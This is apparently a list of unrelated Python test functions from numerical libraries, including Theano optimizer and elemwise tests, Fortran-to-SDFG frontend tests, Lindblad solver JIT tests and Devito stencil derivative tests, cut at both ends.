'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 
'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def position_op(x, wfunc):\n return x*wfunc", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def test_elemwise2():\r\n rng = numpy.random.RandomState(int(time.time()))\r\n shape = (3, 5)\r\n for pattern in [(0, 1), (1, 0)]:\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), name=None)\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle(pattern))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32') * .3)\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n 
dtype='float32'), 'a')\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle([2, 0, 3, 1]) *\r\n tensor.exp(b ** a).dimshuffle([2, 0, 3, 1]))], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32'))", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_var_idx_in_modes(self, arr, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"int array vars =\\n{}\\nMZgate(0, 1) | [vars[0], vars[1], vars[2]]\".format(arr)\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0, 1], 'kwargs': {}, 'modes': [1, 2, 3]}\n ]", "def test_1d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(x):\n return [x**2, x]\n \n a = func(1)\n self.assertEqual(len(self.storage), 1)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(2)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [2**2, 2])\n \n a = func(1)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(1.5)\n self.assertEqual(len(self.storage), 2)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = 
mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n ((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n ((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / 
fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * (fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, 
numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def run_2dtest(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n xlin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n ylin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n X,Y = np.meshgrid(xlin, ylin)\n\n # Store resulting LoS integrations in results\n results = X\n for i in range(0,num_sight_lines+1):\n for j in range(0,num_sight_lines+1): \n results[i,j] = testsph(X[i,j],Y[i,j],smoothing,dim=dim)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n\n # Have to integrate across x for every y\n Int_step = np.zeros( num_sight_lines+1 )\n for iy in range(0, num_sight_lines+1):\n isfin = np.isfinite(results[iy,:])\n Int_step[iy] = integrate.trapz(results[iy,isfin], xlin[isfin])\n # Now integrate across y\n isfin = np.isfinite(Int_step)\n particle_integral = integrate.trapz(Int_step[isfin], ylin[isfin])\n # \"All smoothing lengths should integrate to the same value of unity \"\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n isfin = np.isfinite(results[0,:])\n traces.append(go.Scatter(y=results[0,isfin], x=xlin[isfin]))\n\n # The integral of the entire particle should be unity, the trace of axis will not be however\n plot(traces)", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def test_fortran_frontend_view_test_3():\n test_name = \"view3_test\"\n test_string = \"\"\"\n PROGRAM \"\"\" + test_name + \"\"\"_program\nimplicit none\ninteger, parameter :: n=10\ndouble precision a(n,n+1,12),b(n,n+1,12)\n\nCALL \"\"\" + test_name + \"\"\"_function(a,b,n)\n\nend\n\nSUBROUTINE \"\"\" + test_name + \"\"\"_function(aa,bb,n)\n\ninteger, parameter :: n=10\ndouble precision a(n,n+1,12),b(n,n+1,12)\ninteger j,k\n\nj=1\n call viewlens(aa(:,:,j),bb(:,:,j),bb(:,:,j+1))\n\nend SUBROUTINE \"\"\" + test_name + \"\"\"_function\n\nSUBROUTINE viewlens(aa,bb,cc)\n\nIMPLICIT NONE\n\ndouble 
precision :: aa(10,11),bb(10,11),cc(10,11) \n\nINTEGER :: JK, JL\n\nDO JK=1,10\n DO JL=1,11\n cc(JK,JL)=bb(JK,JL)+aa(JK,JL)\n ENDDO\nENDDO\n\nEND SUBROUTINE viewlens\n \"\"\"\n sdfg = fortran_parser.create_sdfg_from_string(test_string, test_name)\n sdfg.simplify(verbose=True)\n a = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n b = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n\n b[0, 0, 0] = 1\n sdfg(aa=a, bb=b, n=10)\n assert (b[0, 0, 0] == 1)\n assert (b[0, 0, 1] == 43)", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_gradable_funcs(self):\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = None", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test032_2d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n 
np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def evaluable_view(self, stencil, offset=0):\n return self._evaluable_view(stencil, self.arr, offset)", "def test_fortran_frontend_view_test_2():\n test_name = \"view2_test\"\n test_string = \"\"\"\n PROGRAM \"\"\" + test_name + \"\"\"_program\nimplicit none\ninteger, parameter :: n=10\ndouble precision a(n,11,12),b(n,11,12),c(n,11,12)\n\nCALL \"\"\" + test_name + \"\"\"_function(a,b,c,n)\n\nend\n\nSUBROUTINE \"\"\" + test_name + \"\"\"_function(aa,bb,cc,n)\n\ninteger, parameter :: n=10\ndouble precision a(n,11,12),b(n,11,12),c(n,11,12)\ninteger j,k\n\nj=1\n call viewlens(aa(:,:,j),bb(:,:,j),cc(:,:,j))\nk=2\n call viewlens(aa(:,:,k),bb(:,:,k),cc(:,:,k))\n\nend SUBROUTINE \"\"\" + test_name + \"\"\"_function\n\nSUBROUTINE viewlens(aa,bb,cc)\n\nIMPLICIT NONE\n\ndouble precision :: aa(10,11),bb(10,11),cc(10,11) \n\nINTEGER :: JK, JL\n\nDO JK=1,10\n DO JL=1,11\n cc(JK,JL)=bb(JK,JL)+aa(JK,JL)\n ENDDO\nENDDO\n\nEND SUBROUTINE viewlens\n \"\"\"\n sdfg = fortran_parser.create_sdfg_from_string(test_string, test_name)\n sdfg.simplify(verbose=True)\n a = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n b = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n c = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n\n b[0, 0, 0] = 1\n sdfg(aa=a, bb=b, cc=c, n=10)\n assert (c[0, 0, 0] == 43)\n assert (c[1, 1, 1] == 84)", "def test_elemwise3():\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.fvector()\r\n new_val = (a + b).dimshuffle([2, 0, 3, 1])\r\n new_val *= tensor.exp(1 + b ** a).dimshuffle([2, 0, 3, 1])\r\n f = pfunc([b], [], updates=[(a, new_val)], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(numpy.random.rand(6), dtype='float32'))", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def 